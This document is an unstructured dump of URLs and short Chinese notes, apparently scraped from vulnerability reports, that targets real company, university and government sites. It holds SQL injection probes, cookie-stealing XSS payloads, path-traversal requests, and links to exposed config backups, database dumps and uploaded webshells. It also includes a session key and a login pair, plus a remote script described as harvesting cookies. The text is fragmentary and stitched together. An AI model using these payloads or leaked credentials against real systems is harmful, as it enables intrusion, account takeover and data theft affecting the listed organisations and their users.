http://p.zj189.cn/pepsi/lr/submitaward.action可以查看所有兑换100M流量的童鞋。。。。。 http://www.hblsj.gov.cn/InfoPublish/CategoryViewNormal.aspx?child=210&parent=209 http://www.v5shop.com.cn/dama.asp http://wap.jinti.com/fangchan/index.aspx http://wap.jinti.com/fangchan/wap_list_selloffice.aspx http://www.paidai.com/user/register.php?act=ok&uid=649925 http://uc.nearme.com.cn/usercenter/resetPassword.do URL:http://uc.nearme.com.cn/usercenter/resetPassword.do Method:POST Code:200 Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Encoding:gzip,deflate,sdch Accept-Language:en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4 Connection:keep-alive Content-Type:application/x-www-form-urlencoded Cookie:JSESSIONID=aaay1gJXnU7768sxcR6iu Host:uc.nearme.com.cn Origin:http://uc.nearme.com.cn Referer:http://uc.nearme.com.cn/usercenter/resetPassword.do http://mga.people.com.cn/ http://mga.people.com.cn:80/ http://www.lxcourt.gov.cn/phpmyadmin http://www.lxcourt.gov.cn/phpinfo.php http://tuangouguanli.kaixin001.com/ http://hzclub.vanke.com http://hzclub.vanke.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=monyer&Connector=connectors/asp/connector.asp http://hzclub.vanke.com/admin/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/ http://www.hhly.gov.cn/Admin/login.php http://58.83.219.80/ http://travel.haier.com:80/travel/manager/ReLogin.aspx http://外网网址/general/ http://外网网址/pda/ http://115.182.21.15/ http://adobecu.com/Index/Default.aspx http://adobecu.com/news/default.aspx?Class=2&Page=4 http://x.tom.com/ data:text/html;base64,PHNjcmlwdD5hbGVydCgid29veXVufnRlc3QiKTwvc2NyaXB0Pg== http://m.tom.com/index_ring_new.php?page=1&type=lingsheng&mobiletypeid=10010001&catalog=1&t=4 http://m.tom.com/index_ring_new.php?page=1&type=lingsheng&mobiletypeid=10010001&catalog=1&t=4 http://m.tom.com/index_ring_new.php?page=1&type=lingsheng&mobiletypeid=10010001&catalog=1&t=4 http://m.tom.com/index_ring_new.php?page=1&type=lingsheng&mobiletypeid=10010001&catalog=1&t=4%20and%20length%28database%28%29%29=5 http://usermz.5see.com/cmd.aspx http://vote.sports.tom.com http://vote.sports.tom.com/votecode/%3f.jsp http://vote.sports.tom.com/resin-doc/viewfile/?contextpath=/&servletpath=&file=WEB-INF/web.xml http://vote.sports.tom.com/.viminfo http://vote.sports.tom.com/.bash_history http://edu.mohurd.gov.cn http://cnzz.tom.com/store/product/storeProductSearch.do?actionType=list&storeId=1111110028 http://cnzz.tom.com/store/product/storeProductSearch.do?actionType=list&storeId=1111110028 http://cnzz.tom.com/store/product/storeProductSearch.do?actionType=list&storeId=1111110028 http://www.10010js.com/wdzh/zhmm/findPassword.shtml http://xsgl.wtu.edu.cn/epstar/login/index.jsp http://58.83.219.72/ http://bbs.weiqi.tom.com http://dgbest.tom.com/application.php http://123.127.246.26:8080/login.action http://ts12345.tangshan.gov.cn/dcms/bmsAdmin/Admin-logon.action http://116.228.44.6:8080/jybz/logon.action http://42.96.149.244/ http://weiyena.travel.tom.com/admin.php http://61.136.205.112/index_index.action http://114.247.187.140/index.action http://221.7.213.242/ http://121.15.139.141/ http://183.232.70.29:8080/user!userLogin.action http://59.173.236.229/web/index!index.action http://club.jinti.com/admin/admin_CaiJiSaleManage.asp?DepClassid=1 http://sale.jinti.com/admin/admin_CaiJiSaleManage.asp?DepClassid=1 http://pcab.nlc.gov.cn/ http://61.136.205.112/index_index.action http://battery.tcl.com/read_news.php?id=27 http://xjd.tcl.com/showclick.asp?guid=20130422184740176 http://aobo.tcl.com/leftabout.asp?id=3 http://callcenter.tcl.com/tclcc/portlets/Examine/begin.do?form_id=3 http://cip.tongfangpc.com.cn/cipweb/base/store!input.action http://v.vnet.mobi/portal/wap/home/index.jsp?fr=v_uc http://www.tongjiang.gov.cn/admincp.php http://218.106.133.136/login.aspx http://218.106.133.140/ekp/login.jsp http://a.it168.com http://a.it168.com/config/config_global.php.bak http://a.it168.com/config/config_ucenter.php.bak http://wp.it168.com http://wp.it168.com/config/config_global.php.bak http://wp.it168.com/config/config_ucenter.php.bak http://61.55.167.98 http://61.55.167.98/config/config_global.php.bak http://61.55.167.98/config/config_ucenter.php.bak http://forum.ucweb.com http://forum.ucweb.com/uc_server/data/config.inc.php.bak http://119.254.86.197:5555/index.jsp inurl:goitem.asp?id= site:uc.cn inurl:jsessionid http://meeting.zzedu.net.cn/login.jsp http://webi.tom.com/ http://performance.wanda.cn/index.do http://performance.wanda.cn/type.do?tid=2434581611559502&sid=1474181411546235 http://performance.wanda.cn/type.do?tid=2434581611559502&sid=1474181411546235 http://cfp.fpsbchina.cn/fpscc/ http://218.58.70.209:8080/ http://218.58.70.209:8080/common/selmultiman.jsp http://218.58.70.209:8080/common/selmultiman.jsp http://121.207.254.13/install/cemdb/bdimport.php http://www.hczfgjj.com/console/actions/mbean/MBeanFramesetAction?bodyFrameId=wl_console_frame_1384018720305&isNew=false&frameId=wl_console_frame_1384018720306&sidebarFrameId=wl_console_frame_1384018720307&MBean=mydomain%3AName%3Dmydomain%2CType%3DDomain http://www.lbszfgjj.org/console/actions/mbean/MBeanFramesetAction?bodyFrameId=wl_console_frame_1384026638791&isNew=false&frameId=wl_console_frame_1384026638792&sidebarFrameId=wl_console_frame_1384026638793&MBean=myweb%3AName%3Dmyweb%2CType%3DDomain http://f1.warlord.duowan.cn/ http://bbs.taobao.com/catalog/thread/508895-264831340.htm http://211.139.95.67:8080/login.action default:/usr/local/java/jre/lib/ppc64:/usr/lib http://www.ibm.com/ http://dref.csdl.ac.cn/digiref/ http://www.las.ac.cn/nslservice/Ill/login.jsp http://www.xdwan.com/help/list.aspx?gid=null&key= http://co.rank.91.com/enzf/honour.aspx http://lenovobbs.lenovo.com.cn/forum.php http://go.sohu.com/2013/innovator/uploadvote.php http://bbs.wan.58.com http://www.gszhenyuan.gov.cn/Index.html http://218.106.129.6/logo.asp www.xywy.com site:www.xywy.com http://performance.wanda.cn:80/type.do?tid=968060431-198325&sid=1474181411546235&treenews=2066209175-17633 http://performance.wanda.cn/type.do?tid=968060431-198325&sid=1474181411546235'%20and%20'1'='1&treenews=2066209175-17633 http://performance.wanda.cn/type.do?tid=968060431-198325&sid=1474181411546235'%20and%20'1'='2&treenews=2066209175-17633 http://www.vans-china.cn/LoginUser http://www.haierbid.com http://www.haierbid.com/Desktop/InfoListByClass.aspx?ClassId=11 service.500wan.com/inc/ http://cif.trs.com.cn http://www.dagexing.com/member/member_userCenterSkip.action http://cetv.yule.tom.com/cms/php/ http://www1.gdbnet.cn/index.aspx这应该是广东分站 http://www1.gdbnet.cn/Template/Store/moban_50/ProductDetail.aspx?InfoID=7163134。ps:- http://u.china.com/photo/?_a=showphoto&albumid=21587&pass=&photoid=247416&uid=10392071 http://club.tom.com/present.tar.gz http://club.tom.com/login.php?backurl=%22%3E%3Cscript%3Ealert%28/wooyun.org/%29%3C/script%3E http://58.53.209.102:8080/web/hsy_index.aspx http://58.53.209.102:8080/admin/login.aspx http://adpm.cbex.com.cn//mon/uct/core/my-pwd.action http://www.csrc.ac.cn:8280//meeting/meeting/userLogin.action http://222.246.131.141/ http://www.decfc.dongfang.com/bulletin/bulletin_List.php?ID=3 http://cs.cfca.com.cn/cgi-bin/CertQuery!input.action http://cq.sina.com.cn/t.html?url=http://weibo.com/2128914281/AhFTECmy6 http://www.cqta.gov.cn/cquinfo/List.aspx?id=80 http://housing.jinti.com/chizhou-zufang/d20441427.htm http://corevms.ppstream.com/登录页面 http://www.jyqts.gov.cn/web.rar http://124.127.49.68:83/total.asp http://124.127.49.68:83/excel/ http://hi.189.cn/dragon/Tymc_order_detailinfo.jsp?BASICORDERID=8310 http://drops.wooyun.org/papers/58 http://passport.jinti.com/login.aspx http://passport.jinti.com/login.aspx?reurl=http://www.reurl.com,reurl的值就是登陆成功后跳转的地址。 http://zzjyt.haier.net/ZZJYT/login/index.jsp http://zzjyt.haier.net/ZZJYT/login/test.jsp http://zzjyt.haier.net/ZZJYT/login/test.jsp http://zzjyt.haier.net/ZZJYT/login/test.jsp http://sqlmap.org http://zzjyt.haier.net/ZZJYT/login/index.jsp http://wooyun.org/bugs/wooyun-2013-038426 http://mir3.abc.sdo.com/knowledgebase/GetKnowledgeBase http://wap.ccw.com.cn/cmd.php http://www.peoplecity.cn/pmgyggds/index.action http://www.peoplecity.cn/pmgssyds/index.action http://www.tjsafety.gov.cn/Admin/admin_login.aspx http://cailing.tom.com/index_ring_new.php?type=lingsheng&mobiletypeid=10010001&catalog=2&t=4 http://cailing.tom.com/index_ring_new.php?type=lingsheng&mobiletypeid=10010001&catalog=2&t=4 http://cailing.tom.com/index_ring_new.php?type=lingsheng&mobiletypeid=10010001&catalog=2&t=4 http://cailing.tom.com/index_ring_new.php?type=lingsheng&mobiletypeid=10010001&catalog=2&t=4%20and%20length%28database%28%29%29=5 http://ideaclub.lenovo.com.cn/forum/,同样可以用这个帐号登录后台 http://ideaclub.lenovo.com.cn/erazer/ http://service.clo.com.cn/Common/EventDtl/Event_Dtl.aspx?EventCode=SJ00040388 http://bbs.paidai.com/topic/197923 http://monitor.maxthon.cn/index.php http://tieba.baidu.com/pmc/recycle http://www.whta.gov.cn/gov/lyml.asp?typer=jq http://www.whsmz.gov.cn/ http://xui.ptlogin2.qq.com/cgi-bin/qlogin www.qq.com http://ptlogin2.qq.com/undefined?clientuin=54160134x&clientkey=00015281B6FE00686FAF6D75E76ECC7D6DB2C1BB1CA3D14091C87E306776F04DDE11D6F90600AF9C84AC930D98CB9C86148525D2EA1376442C0B6D43C51BEC5BFBA9685E37D9BD9A192FCF8B70E3498C86314DF5E7D06512E347516BEEFF72A0CB07087F461A701B70FCB567C3E5xxx http://www.mileyx.com http://wydrops-wordpress.stor.sinaapp.com/uploads/2013/11/t.rar http://wd.xygy.gov.cn/install/upgrade.aspx http://wd.xygy.gov.cn/_temp/2/2.asp http://59.61.88.198:8000/ appi.zto.cn/appi/interface.php?style=json&func=news.list&class=1&page=1&size=1&keyword= http://218.6.242.100/Admin/Admin.fhtml http://univ.zte.com.cn:80/ztetrain/login.aspx http://bbs.111g.com/config/config_ucenter.php http://www.sdaj.gov.cn/Portal/page/upload/showfile.asp?id=2967 http://ac.haidilao.com/ http://ac.haidilao.com/WebServices/WebServiceSSOUser.asmx http://netspnew.cdgh.gov.cn/ http://netspnew.cdgh.gov.cn/UserApply.aspx?type=5 http://shenbao.gzwater.gov.cn/ http://shenbao.gzwater.gov.cn/jhysDataManage/loginAction!login.action http://www.qqhrfgj.gov.cn/js/xxxh/?F1673D7A7CE8D3AC http://tita.qq.com/bbs http://tita.qq.com/bbs/config/config_global.php.bak http://tita.qq.com/bbs/config/config_ucenter.php.bak http://pay.game.test.pps.tv/gamepay/game_pay_main/index?g_id=281d&tid=5601&server_type=0 http://pay.game.test.pps.tv/gamepay/game_pay_main/index?g_id=281d&tid=5601&server_type=0 http://support.zte.com.cn http://support.zte.com.cn/admin/ http://biz.finance.sina.com.cn/fund/fund_page/cmp_img_jz.php?fund_code=000011&ccode1=&ccode2=000001&putday=5&1335363286033 http://gwact.woniu.com/9yin/h111224/admin?end_time=&server=&start_time=&state=&user= http://61.155.50.147/login.aspx http://61.155.50.147/fckeditor/editor/filemanager/connectors/test.html http://61.155.50.147/files/file/asp.asp/asp.jpg http://www.crmg-lz.com/struct.asp?classid=2 https://www.ciqgs.com:6889/HG/ https://www.ciqgs.com:6889/admin/protected/deployer.jsp https://www.ciqgs.com:6889/job/jb.jsp http://210.21.223.45/index.jsp http://wap.zto.cn/ http://wap.zto.cn:80/province.aspx?wang=-1 http://www.dooland.com/iptv/article.php?id=174129 error:1064 http://apt.weiphone.com/index.php?action=packageRead&id=27518 https://www.huobi.com/market/huobi.php?a=detail&jsoncallback=jQuery17;%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E2579187126594714_1384327877885&_=1384327878137 http://***.shenzhenair.com/***/ http://zhuhai.kingdee.com/about/index.html http://minisite.youku.com/cmt/index.php/Common/Talks?page=1&psize=8&_day=2013-09-24 http://minisite.youku.com/cmt/index.php/Common/Talks?page=1&psize=8&_day=2013-09-24 http://minisite.youku.com/cmt/index.php/Common/Talks?page=1&psize=8&_day=2013-09-24 http://minisite.youku.com/cmt/index.php/Common/Talks?page=1&psize=8&_day=2013-09-24 http://mz.5see.com/admin/Default.aspx http://usermz.5see.com/user/head/xiaolou http://zhengzhou.kingdee.com/search/result.html http://ecard.nankai.edu.cn/getfjnr.action?fjid=8ae48a8a254e6f8101254ea07c2d0003 http://ecard.sdu.edu.cn/getfjnr.action?fjid=53d6b6923cff8518013f5f2b4b59000b http://ecard.ldu.edu.cn/getfjnr.action?fjid=4a42b0f33381c4f90133d498614e0009 http://ecard.ldu.edu.cn/getfjnr.action?fjid=4a42b0f33381c4f90133d498614e0009 data:text/html;base64,PHNjcmlwdD5hbGVydCgid29veXVufnRlc3QiKTwvc2NyaXB0Pg== http://tvs.tcl.com/main/ShowAsk.aspx?ID=368069 http://123.103.23.24/logon.jsp http://try.fumu.com/ http://rtb.behe.com/ck?adid=886688&orderid=17618&exchgid=99&umode=1&refer=http%3A%2F%2Fmedia.behe.com&landing=http%3A%2F%2Fwww.jiuxian.com%2Fcoop%2Fcpstrack.php%3Fsrc%3Dbihe%26code%3Dbihe1%26url%3Dhttp%3A%2F%2Fwww.jiuxian.com http://jm.behe.com/tools/201311/152.html http://rtb.behe.com/ck?adid=886688&orderid=17619&exchgid=99&umode=1&refer=http%3A%2F%2Fmedia.behe.com&landing=http%3A%2F%2Fwww.jiuxian.com%2Fcoop%2Fcpstrack.php%3Fsrc%3Dbihe%26code%3Dbihe2%26url%3Dhttp%3A%2F%2Fwww.jiuxian.com http://jm.behe.com/tools/201311/153.html http://www.magnotel.com/MemberManage/OrderDetail----CC2010072016540.html http://gongdan.www.net.cn/ http://zhuzhou.kingdee.com/pub/list/101201/list2_15.html http://zhongshan.kingdee.com/success-stories/index.html http://www.xunware.com/front/memberfront/memberFront_vipLogin.do http://www.csxks.cn/front/memberfront/memberFront_vipLogin.do http://220.168.55.61/front/memberfront/memberFront_vipLogin.do http://www.hnxj.org/front/memberfront/memberFront_vipLogin.do http://124.117.230.249/front/memberfront/memberFront_vipLogin.do http://jydd.xjedu.gov.cn/front/memberfront/memberFront_vipLogin.do http://dc.xunware.com/front/memberfront/memberFront_vipLogin.do http://xjgk.xjedu.gov.cn/front/memberfront/memberFront_vipLogin.do http://gpjh.xjedu.gov.cn/front/memberfront/memberFront_vipLogin.do http://www.kshr.com.cn/Person/Per_Search_JobType.aspx?jobtype=1 http://i.appchina.com/wordpress/wp-admin/ http://xss.tw/4108 http://info.tcl.com/ http://218.106.133.140/ekp/login.jsp pay.game.test.pps.tv/gamepay/paygameindex/index pay.game.test.pps.tv/gamepay/paygameindex/index live.pps.tv/index.php/epg/get_channel_list?cat_code=1 live.pps.tv/index.php/epg/get_channel_list?cat_code=1 http://m.jiuxian.com/user/add_bonus http://202.104.120.69/admin/workbench.faces http://223.4.211.13:8088/ www.chrm.gov.cn www.dongping.gov.cn www.cjr.org.cn www.creditcard.com.cn采用dedecms5.7,存在变量覆盖漏洞 http://yxmhero1989.blog.163.com/blog/static/11215795620135811848658/ http://lecture.pku.edu.cn/lecture_more.php?typeid=5 http://live.pps.tv/index.php/epg/get_program_list_by_timezone?cat_code=1 http://live.pps.tv/index.php/epg/get_program_list_by_timezone?cat_code=1 http://223.202.15.179 http://console.app.mykingdee.com/api/login-img.action y.china.com.cn/user http://jckc.gov.cn/ http://218.106.129.8/ http://www.u-loveit.cn/ajax/down.aspx?p=images/bz1.jpg http://www.aigo.com/11.rar http://m.jinti.com/login.aspx http://www.ths.gov.cn/ http://javashop3.javamall.com.cn/admin http://javashop3.javamall.com.cncore/admin/themeFile!list.do?themeid=1&folderName=/../../&type=file http://javashop3.javamall.com.cn/editor/ckeditor/11.jsp http://www.hualaisurvey.com/admin/login.html修改成http://www.hualaisurvey.com/admin/admin.aspx http://kt.tcl.com http://124.128.202.20:7001/oryxSDJGWebApp/statistics/scdwxx/qyxxquery.jsp http://blog.sina.com.cn/s/blog_d38c52360101nhu0.html http://d1.sina.com.cn/litong/zhitou/identity.html http://d1.sina.com.cn/litong/zhitou/storage.swf,并且会调用以下代码: line-height:160%;font-size:14px http://www.jilixingdong.org/browser.jsp http://union.500.com/pages/checkuserinfo.php?name=admin&email=xx%40qq.com http://m.7k7k.com/about.html http://monitor.house365.com/index.php http://www.fumu.com/api/js.php http://202.110.133.70/xzspweb/ http://jiandu.happigo.com:8080 http://jiandu.happigo.com:8080/robots.txt%00.php http://guangzhou.baixing.com/qiufang/a290159374.html rates.homeinns.com/Servers/HotelData.ashx?fid=huizhou-0752 http://112.124.3.235:88/zte/ http://wenwen.soso.com/z/q127133864.htm inurl:cms/Column.aspx inurl:cms/Column.aspx?LMID= http://admin.chineseall.cn/index.action http://admin.chineseall.cn/book/listBookSchoolSort.action http://jiasu.qule.com/gif.jsp http://www.jntlj.com/cx_nr.aspx?type=SSXW&id=5674 www.hh010.com http://1.com\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u002f\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029\u003e/1.swf http://douwan.tudou.com/ http://www.jinti.com/members/ClassInfoManage.asp http://housing.jinti.com/aspx/aspx/Person_my_posts_all.aspx s.cn/1.jpg http://xjd.tcl.com/jxscx.asp http://www.sanjin.com.cn/job/zpxx/JobDetailServlet?id=263 http://www.sanjin.com.cn/job/zpxx/JobDetailServlet?id=263'and'a'='a http://www.sanjin.com.cn/job/zpxx/JobDetailServlet?id=263'and'a'='as http://m.jobui.com/company/10483991/review/ http://post.tom.com/post.tar.gz http://post.tom.com/qa/env.php http://invoice.skype.tom.com index.php/login/signin http://invoice.skype.tom.com:80/ http://www.duomai.com/index.php?m=article&a=artlist http://www.duomai.com/index.php?m=siter_act&channel=&ads_cate=&apply_mode=&apply_status=&actname=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E http://mgs.homeinns.com/ http://mgs.homeinns.com/motelbbs/ www.hitachi.com.cn/hitachi.rar http://95598.js.sgcc.com.cn/95598/myspace/initPass.action http://news.qq.com/10/dreamlab.htm http://sae.sina.com.cn/网站利用自己的服务器,写js脚本 http://sae.sina.com/上的服务器应用部署的js,可以显示出在腾讯分站上登陆留言人的cookie值 http://www.xss.com/x.js http://www.qiushibaike.com/my/edit http://ptxyb.cuepa.cn/admin/admin_login.php http://ptxyb.cuepa.cn/admin/admin_login.php?tran=87efca281fd740e0c2b50a5b27bd711f370682ccdd503f39d4f2c1696e6472ffb9240c267258 http://homeinns.blog.sina.com.cn/search.php?art=88952634&author=88952634 http://dm.3gtv.letv.com http://user.roowei.com/user/login用户及商家登陆口 http://114.255.40.138 http://114.255.40.138/db.sql http://117.79.157.13/ http://117.79.157.13:80/cgi-bin/ast_vs_pre http://www.mediinfo.com.cn/ inurl:cms/Column.aspx?LMID= http://www.zchospital.com/cms/Column.aspx?LMID=1 http://www.zchospital.com/cms/Column.aspx?LMID=1 www.zchospital.com/cms/ www.zjqhyy.com/cms/ www.zjhl.org/cms www.ywzxyy.com/cms/ www.z2hospital.com/cms www.zjtongde.com/cms/ www.ks2y.com/cms/ nhdyyy.com/cms/ www.hnzyy.cn/cms/ www.zjukidney.com/cms/ www.zjukidney.com/cms/ http://back.adquan.com/article1.php?id=13831 http://1dui1.huatu.com/index.php/OnlineDetail/?videoType=5&classtype=202&province=7&SubjectType=3&id=24976 http://1dui1.huatu.com/index.php/OnlineDetail/?videoType=5&classtype=202&province=7&SubjectType=3&id=24976 http://1dui1.huatu.com/index.php/OnlineDetail/?videoType=5&classtype=202&province=7&SubjectType=3&id=24976 http://office.homeinns.com/staffinfo/files/如家酒店集团通讯录%207.17.xlsx http://office.homeinns.com/staffinfo/files/%E6%9C%80%E6%96%B0%E5%85%AC%E5%8F%B8%E9%80%9A%E8%AE%AF%E5%BD%95.csv http://office.homeinns.com/staffinfo/ http://office.homeinns.com/staffinfo/contact.aspx http://www.beexiaomifeng.com/www.rar http://yangtian.lenovo.com.cn/yangtian.tar.gz http://bbs.eol.cn/config/config_ucenter.php.bak www.ylhrss.gov.cn http://www.ylhrss.gov.cn/indexAction.action http://rates.homeinns.com/Mains.aspx?city=tianjin&hotel=022026 http://emp.cnr.cn/milvote/ShowServlet?qid=1 http://www.hottickets.cn/new.php?id=15 http://gz.ip66.com/ http://113.107.24.234/admin/privilege.php?act=login http://tieba.baidu.com/bigscreen/fbs?tid=2642760579 http://tieba.baidu.com/f?ie=utf-8&kw=test http://tieba.baidu.com/game/index http://tieba.baidu.com/game/index?tab=lottery http://111.4.115.185/admin http://111.4.115.185//php.ini http://111.4.115.185//console/php/lib http://111.4.115.185//console/php/lib/cachecore/cacheapc.class.php ftp://111.4.115.185/ http://111.4.115.185/upload/404.php http://125.46.11.219 http://125.46.11.219/download/ http://quan.v5shop.com.cn http://quan.v5shop.com.cn/commond.aspx?id=100386 http://service.v5shop.com.cn http://service.v5shop.com.cn/help.aspx?id=185 http://account.xinli001.com/resetpwd/?username=用户邮箱&code=13846 http://125.46.11.218/ http://120.205.13.86:8888/login.action http://120.205.13.86:8888/login.action http://120.205.13.86:8888/shell.jsp http://taokebao.v5shop.com.cn/js_detailbuybutton.aspx?id=192 http://taokebao.v5shop.com.cn/js_detailspecstip.aspx?id=192 http://taokebao.v5shop.com.cn/productpic.aspx?id=154 inurl:js_detailbuybutton.aspx inurl:js_detailspecstip.aspx inurl:productpic.aspx inurl:productpic.aspx http://shop.optoma.com.cn/productpic.aspx?id=114 http://www.eglip.com/productpic.aspx?id=100540 http://ilikeulike.cn/productpic.aspx?id=1 http://www.hjqtc.com/productpic.aspx?id=1258 http://www.cs929.com/productpic.aspx?id=12 http://www.xiaokang.com/productpic.aspx?id=19678 http://www.yinbaojie.com/productpic.aspx?id=100422 http://www.wolifu.com/productpic.aspx?id=122833 http://www.echinasport.com/productpic.aspx?id=100370 http://www.biz-nbculture.com/productpic.aspx?id=100611 http://ws.roowei.com/max-admin/default.aspx http://v.dahe.cn/ http://corp.21cn.com/index_cloud.shtml http://www.qszkb.gov.cn/admint9vneqz.php http://www.hljts.gov.cn/web/ http://125.46.11.215/ http://www.hbcinemas.com.cn/main!mainEnter.action存在远程代码执行漏洞 http://old.homeinns.com/ http://www.zzbaike.com/zzbaike.zip http://95598.hn.sgcc.com.cn/fckeditor/editor/fckeditor.html http://info.seac.gov.cn:8888/seacwwwout/login.action http://info.seac.gov.cn:8888/seacwwwout/shell.jsp http://www.haitangshow.com/ http://124.238.218.103/section/141 office.homeinns.com/staffinfo/‎ office.homeinns.com/hcs/‎ office.homeinns.com/staffinfo/login.aspx http://office.homeinns.com http://jk.tiexue.net/index.php http://scm.zte.com.cn/wms/Stat/QueryBoxBillInfoFrm.aspx?para1=ECC¶2=zh-CN¶3=EL1XCiQpJbb2fFtygNWUrtdD21YjwB6P http://scm.zte.com.cn/wms/Stat/QueryBoxBillInfoFrm.aspx?para1=ECC¶2=zh-CN¶3=CW72aJu6%2bn2HgsitIbPjH1SFUXSq4ia%2f http://scm.zte.com.cn/wms/Stat/QueryBoxBillInfoFrm.aspx?para1=ECC¶2=zh-CN¶3=QTTo2cYmaEw48d2a6fCN8yQTfM3gBqs5 http://scm.zte.com.cn/wms/Stat/QueryBoxBillInfoFrm.aspx?para1=ECC¶2=zh-CN¶3=GwyCPptlk5Oz6g31JvnAqAfjcQvwDe8j http://mgmt.motel168.com http://ucar.gac-toyota.com.cn/FB0401.aspx?AuthorNo=C37B1020131113008 http://bbs.auto.ifeng.com的uc_server弱口令123456 http://bbs.auto.ifeng.com/admin.php-》后台拿shell http://monitor.ruc.edu.cn/index.php http://www.xydpc.gov.cn/ http://video.sunland.org.cn/back/login.action https://my.ule.com/usr/sslvalidateLogin.do http://www.xss.com/x.js http://www.cmd5.com去破解居然是收费的擦, http://58.241.17.91:8002/detail.asp?bh=1'%22&dm=A&zfl= http://comic.tom.com/search.php http://bbs.comicdd.com/config/config_global.php.bak http://www.coremail.cn/blog/wp-login.php http://tvs.tcl.com/main/Login.aspx http://hi.189.cn/service/transaction/v5/esurfing/renew.jsp http://112.124.3.235:88/zte/index!dologin.action http://tclkt.etoway.cn/ http://tclkt.etoway.cn/web/SubmitLogin.do http://tclkt.etoway.cn/web/SubmitLogin.do http://taobao.fumu.com/robots.txt/1.php http://taobao.fumu.com/member/login.php http://taobao.fumu.com/member http://taobao.fumu.com/ask/question.php http://taobao.fumu.com//uploadfile/2013/1114/20131114092401208.swf/1.php http://j.esf.sina.com.cn/housereal/toupload?id=25423 http://www.360sky.com:80/announce.jsp?fileid=9343112 http://www.114school.cn/xytypt/fountain.showrefererurl.act?nodeid=100000 http://www.forbeschina.com/list/show_list.php?id=1909 http://www.hnnjj.gov.cn/FCKeditor//editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F../ http://open.weibo.com/blog diandian.com/inbox http://icp.sundns.com/index.php?option=forgetpass data:register=1&email=ds@q.c& http://www.homeinns.com/WEB-INF/web.xml http://old.homeinns.com/Present.rar http://www.111g.com/?ct=product&goods_id=118 http://www.111g.com/?ct=product&do=do http://www.libsys.com.cn/download.php?resulttype=SETUP http://yd.ad.tom.com/aaa.sql www.hljzx.gov.cn网站的“文章搜索”框存在SQL注入漏洞,参数为CMD。 http://www.bdgt.gov.cn/public/show.jsp?id=20130827161980 http://www.bj.10086.cn/service/promotion/yhjlb/ http://tclzmd.etwowin.com/ http://tclzmd.etwowin.com//web/SubmitLogin http://www.zjna.gov.cn/ http://www.zjna.gov.cn/ecoi/projectItem/initProjectInfo.action allinurl:initProjectInfo.action http://61.132.27.71/ecoi/projectItem/initProjectInfo.action http://221.6.158.154/ecoi/projectItem/initProjectInfo.action http://222.186.119.251/ecoi/projectItem/initProjectInfo.action http://218.3.88.115/ecoi/projectItem/initProjectInfo.action http://answer.tongyi.com/index.php/question/xxmyask?id=57664 http://answer.tongyi.com/index.php/question/xxmyask?id=57664 http://qc.homeinns.com/qc_trainning/login.aspx http://www.xdcms.cn http://jingchengzuoan.com/bbs/admin/login.asp http://office.homeinns.com/hcs/ http://office.homeinns.com/hcs/Configure/GetBackPassword.aspx http://www.crfeb03.com/upload_files/other/20131112231137doBLfe.php http://114.255.169.92/telecom/userloginAction/login.do http://114.255.169.92/telecom/errortishi.jsp http://xiangchengqu.roowei.com/adscontent/?ads_id=871 http://xiangchengqu.roowei.com/adscontent/?ads_id=871 http://netview.cnl.edu.cn http://netview.cnl.edu.cn/cacti/ http://www.fecb.com.cn/ http://bbs.gamebean.com admin:wanglirong http://www.dangao.com/ http://gd.cctv119.cn//plus/search.php?keyword=as&typeArr[1%20uNion%201]=a http://old.homeinns.com http://tfile.motel168.com/ShowHotelImage.aspx?type=1 http://mgmt.motel168.com/ShowHotelImage.aspx?type=1 http://hotel.motel168.com/ShowHotelImage.aspx?type=1 http://www.homeinns.com/queryProduct.html http://www.homeinns.com/queryProduct.html http://www.ln183.com http://www.ln183.com/db.asp http://www.ln183.com/1.rar http://callcenter.tcl.com http://callcenter.tcl.com/tclcc/portlets/downloading/jstbxzflow/queryDealer.do http://bbs.anzhuo.cn/config/config_ucenter.php.bak http://bbs.anzhuo.cn/config/config_global.php.bak http://www.ydpic.sgcc.com.cn/setup/index.jsp http://www.cupl.edu.cn:81/setup/index.jsp http://tuchong.com/ http://www.roowei.com/gg/comcount.php?action=up http://www.roowei.com/gg/comcount.php?action=up_jigou&u_id=190751 http://www.roowei.com/gg/comcount.php?action=up_host&c_id=656034 http://qingan.roowei.com/Search/?Keyword=&Level http://www.cn.roowei.com/Public/comcount.php?ac http://sdlc.roowei.com/Search/?Keyword=&Level=1 http://jiawang.roowei.com/Search/?Keyword=&Leve http://yushushi.roowei.com/Search/?Keyword=&Level=1&match=SPH_MATCH_ALL&Indexes=video&source=481&shendu=4&ac_parent=481 http://www.tclpabx.com/newslist.asp?ID=204 www.4008123456.com/tclcc/portlets/examine/begin.do?form_id=1 inurl:adminindex.jsp http://www.cre.cn/cms/site/cms_site_template_upload.jsp http://www.cupl.edu.cn:81/cms/site/cms_site_template_upload.jsp http://www.chinca.org/cms/cms/site/cms_site_template_upload.jsp http://app.eol.cn/app_info.php?id=48752 http://magazine.tcl.com/manager/login.aspx?ReturnUrl=%2fmanager%2fDefault.aspx http://www.hfssnq.com/admin/ http://www.1688gree.com/admin/ http://www.target.com/siteserver/service/background_taskLog.aspx?Keyword=test% http://bbs.9first.com/ http://bbs.500.com http://www.phpcms.cn/phpsso_server/caches/caches_admin/caches_data/pagelist_cache.php http://e.roowei.com/ www.dianping.com对外展示,可以盗取大量用户cookie,由于dianping认证基础是基于cookie的,危害灰常大哦 http://www.yitel.com/ http://www.yitel.com/HotelList/NewHotelInfo.aspx?hotelcd=029050 http://www.yitel.com/HotelList/YitelHotelList.aspx?Istype=2&CityCd=0411 http://link.admin5.com/1.zip api.cy.daoyoudao.com/app/diydishlist.do?groupid=11016&shopid=12112&curpage=1&pagesize=15&type=commend&clientid=201311201117453907286&versionrelease=ios_ www.china-isi.com http://stat.ccidnet.com//count/count.com.php?image=../../../../include.inc/config.inc.php http://stat.ccidnet.com//count/count.com.php?image=../../../../count/count.com.php http://tu.roowei.com/Album/Album.js.php?callback=success_chanpinlist&action=delete_l&Album_ID=6690&user=191389&_=1384928743815 